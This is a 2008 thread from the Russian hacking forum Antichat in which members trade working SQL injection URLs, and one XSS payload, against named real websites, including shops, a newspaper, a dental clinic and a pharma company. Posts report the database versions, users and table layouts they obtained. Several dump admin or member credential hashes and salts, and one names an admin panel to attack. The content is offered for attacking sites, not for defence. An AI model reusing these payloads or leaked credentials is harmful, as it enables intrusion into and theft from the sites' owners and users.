Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.09.2008, 16:02
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
http://www.sotovikm.ru
http://www.sotovikm.ru/tovar.php?ID=11023+union+select+1,2,3,4,5,6,7,8,9, 10,concat(table_schema,0x3a,table_name,0x3a,column _name)+from+information_schema.columns--
http://www.sotovikm.ru/tovar.php?ID=11023+union+select+1,2,password,4,5,6 ,7,8,9,10,name+from+auth--
login: admin
Pass: pavel
|
|
|
17.09.2008, 19:38
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://stories.pageforyou.ru/story.php?id=127&id_auth=-1+union+select+concat_ws(0x3a3a,login,password),2, 3+from+authors+limit+0,1/*
Странно пас выводится, или с кодировками залупа или черт пойми что еще....
|
|
|
|
18.09.2008, 00:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps= &po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/version(),2,3/**/limit/**/1,1/*
5.0.32-Debian_7etch6-log
+ XSS:
http://www.kelbike.fr/search.php?merchantid=118&brand=AVID&ps=%22%3E%3Cs сriрt%3Ealert%28%27Pashkela%27%29%3C%2Fsсriрt% 3E%3C%22&po=&pv=&ls=1&pmin=3&pmax=40
Последний раз редактировалось Pashkela; 18.09.2008 в 00:33..
|
|
|
|
18.09.2008, 00:59
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Газета Русский Курьер
Код:
http://ruscourier.ru/archive.php?id=-1+union+select+database()/*
http://ruscourier.ru/archive.php?id=-1+union+select+user()/*
http://ruscourier.ru/archive.php?id=-1+union+select+version()/*
database() = ruscouru
user() = ruscouru@localhost
version() = 5.0.26-lk-log
запросы выборки из таблиц следует отправлять методом POST, так как некоторые ключевые слова фильтруются хостингом  . Удобно использовать плагин для firefox: _https://forum.antichat.ru/thread56473.html
от [53x]Shadow
в базе данных есть следующие таблицы:
Код:
banners
bigpoll_answ
bigpoll_quest
block
categories
comments
hot
issue
menu
news
points
rubr
sympoll_auth
sympoll_data
sympoll_iplog
sympoll_list
templates
в таблице sympoll_auth такие поля:
Код:
uid
user
pass
access
secret
В sympoll_auth 2 записи, выборка содержимого таблицы делается примерно так:
Код:
http://ruscourier.ru/archive.php?id=-1+union+select+user+from+sympoll_auth+where+uid=1+limit+1/*
http://ruscourier.ru/archive.php?id=-1+union+select+pass+from+sympoll_auth+where+uid=1+limit+1/*
http://ruscourier.ru/archive.php?id=-1+union+select+secret+from+sympoll_auth+where+uid=1+limit+1/*
соответсвенно и для uid=2
Содержимое таблицы sympoll_auth:
Код:
user:ruscouru
pass:19635f485c127dc207f32fa1e2157779:ufptnf
secret:db447e070183f8b93ddc30b7a1d2472b:1203592175
access:
user:ruscour
pass:9c47efd296e2d077273e01df82314736:flvbyrf
secret:61e598f9762fd92e568b8334f0498476:1205516158
access:1
(хэши md5)
можно заметить что ufptnf в русской раскладке "газета" а flvbyrf - "админка". Для чего предназначено поле secret пока не очень понятно.
по этому адресу скорее всего расположена админка
_http://ruscourier.ru/admin
с HTTP-авторизацией.
к сожалению никакие пароли и их комбинации с полем secret к ней не подходят.
Может у кого-то получится больше. |
|
|
|
18.09.2008, 11:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Вот еще кучка свеженьких!
http://www.ctbinc.com/news.php?news_id=-1+union+select+1,user(),version(),4,5/*
user() - ctbinc@localhost
version() - 4.1.19
database() - ctbinc
http://www.grandmasterrecords.com/news.php?news_id=-1+union+select+1,2,user(),database()--
user() - grandmas_user@localhost
version() - 5.0.51a-community
database() - grandmas_db
http://thefroehlichs.org/news.php?news_id=-1+union+select+1,version(),database(),4,5/*
user() - celeste_admin@76.162.254.221
version() - 4.1.22-standard
database() - celeste_thefroehlichs
http://www.timperleyband.com/news.php?news_id=-1+union+select+1,2,3,user(),5,version(),database() ,8/*
user() - bandman_timperle@localhost
version() - 4.1.19
database() - bandman_timperley
http://www.tilesrx.com/news.php?news_id=-1+union+select+1,2,3,4,5,6,user(),version(),9,data base()/*
user() - ann@localhost
version() - 4.0.12-log
database() - tilesrx
http://www.ulfcar.se/news.php?mode=read&type=Case%20News&news_id=-1+union+select+1,user(),3,version(),5,6,7,8,9/*
user() - ulfcar@web10
version() - 4.0.24-nt-max
database() - ulfcar
http://www.kino.com/video/news.php?news_id=-1+union+select+1,2,3,4,5,6,user()/*
user() - kino@lma671.siteprotect.com
version() - 4.0.12-standard
database() - kino
http://www.capsi.ca/news.php?news_id=-1+union+select+1,email,password,4+from+members+lim it+1,10/*
http://www.bearcat.com.au/news.php?action=show&news_id=-1+union+select+user(),version(),3/*
user() - bearcat2@localhost
version() - 4.0.24_Debian-10sarge2
database() - bearcat2
http://thedentalcarecenter.com/news.php?news_id=-1+union+select+1,2,user(),4,version(),6,7,8,9,10,1 1,12,13/*
user() - dentalcare@silverpine.forest.net
version() - 5.0.20a-max-log
database() - thedentalcarecenter
http://www.alberguscatering.com/news.php?news_id=-1+union+select+1,version(),3,database(),5,6,7,8,9, 10/*
user() - albergus@216.157.37.225
version() - 4.0.24-nt
database() - albergus
http://www.cbcpharma.com/news.php?news_id=-1+union+select+1,password,username,4,5+from+users+ limit+1,1/*
user() - cbcphar@localhost
version() - 4.1.20-log
database() - cbcphar
http://www.ee22.com/eng/news.php?action_type=detail&news_id=-1+union+select+1,2,3,email,5,password,7,8,9,10,11, 12,13,14+from+member+limit+1,1--
user() - ee22@210.245.166.92
version() - 5.0.51a
database() - ee22
http://www.circletechfl.com/news.php?news_ID=-1+union+select+1,2,version(),4,user(),6,7,8/*
user() - CircleTechFl@68.178.211.40
version() - 4.0.27-max-log
database() - CircleTechFl
Некоторые из них магазины, в некоторых есть админки, некоторые просто так, для изучения! =)
|
|
|
|
18.09.2008, 22:38
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
http://www.fuckmachines.de/index.php?page=kategorie&catId=-1+union+select+1,2,concat_ws(0x3a3a,password)+from +admin_user+limit+0,1/*
http://www.fuckmachines.de/admin
не брутится...
Вот что получилось...
admin : 5d2167c87d363636
OHM 2007 : 0643078c5a5c0f3b
Сайт топ гильдии в игре Rfonline.
http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,2,3--
Последний раз редактировалось R1dex; 18.09.2008 в 22:52..
|
|
|
|
19.09.2008, 17:14
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
Сайт топ гильдии в игре Rfonline.
http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,2,3--
В добавку к выше указанным!
http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,2,concat(table_schema,0x3a,table_ name,0x3a,column_name)+from+information_schema.col umns+limit+628,1--
http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,concat(converge_id,0x3a,converge_ pass_hash,0x3a,converge_pass_salt),3+from+forum.cf _members_converge+limit+1,1--
http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,concat(id,0x3a,name,0x3a,email),3 +from+forum.cf_members+limit+1,1--
|
|
|
|
19.09.2008, 17:26
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Код:
http://www.evangelici.net/links/?viewCat=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2/*
4.1.22  hpHoo:ind_admin@localhost
Код:
http://www.e-romanticos.com/autor.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8/*
4.1.20:noeganet_inmoastur:noeganet_lady@localhost
Код:
http://www.anycorp.com/any/magazine.php?id=1%20UNION%20SELECT%201,2,concat_ws(0x3a,version(),database(),user()),4,5%20LIMIT%201,1/*
4.0.24-log:any:any@localhost
|
|
|
|
19.09.2008, 20:29
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Код:
http://psyforum.ru/pssite/article_list.php?id=-1)+union+select+1,2,3,convert(concat(user(),0x20,database(),0x20,version())+using+cp1251)/*
|
|
|
|
20.09.2008, 03:17
|
|
Познающий
Регистрация: 29.02.2008
Сообщений: 35
Провел на форуме:
36950
Репутация:
54
|
|
http://reno.broowaha.com
Код:
http://reno.broowaha.com/profile.php?id=1516=null%20union%20all%20select%200,1,2,3,4,5,6,7,concat(version(),0x7c,database(),0x7c,user()),9,10,11,12,13,14,15,16,17,18--
version() => 4.0.27-standard-log
database() => db162098511
user() => dbo162098511@74.208.16.88
http://employmenttimesonline.com
Код:
http://www.employmenttimesonline.com/companies/profile.php?ID=93=null%20union%20all%20select%200,1,2,3,4,concat(version(),0x3c62723e,database(),0x3c62723e,user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
version() => 4.0.16-standard
database() => employ_et1m3s
user() => employ_employ@localhost
http://www.noborder.org
Код:
http://www.noborder.org/item.php?id=372=null%20union%20all%20select%200,1,concat(version(),0x3c62723e,database(),0x3c62723e,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
version() => 4.1.22
database() => nob
user() => paul@localhost
http://www.dramapod.com
Код:
http://www.dramapod.com/item.php?catid=139=null union all select 0,concat(version(),0x3c62723e,database(),0x3c62723e,user())--
version() => 5.0.51a-community
database() => dramapod_live
user() => dramapod_dpuser@localhost
БД:
Таблицы dramapod_live:
Код:
dp_reviews[item, rstatus, rip, rname, remail, rurl, rrating, review, reviewdate]
dp_status[desc]
dp_users[uname, pass]
dp_views[item, ip, viewdate, processed]
dp_votes[voter, item, rating, votedate, processed]
Последний раз редактировалось ArxWolf; 20.09.2008 в 04:07..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
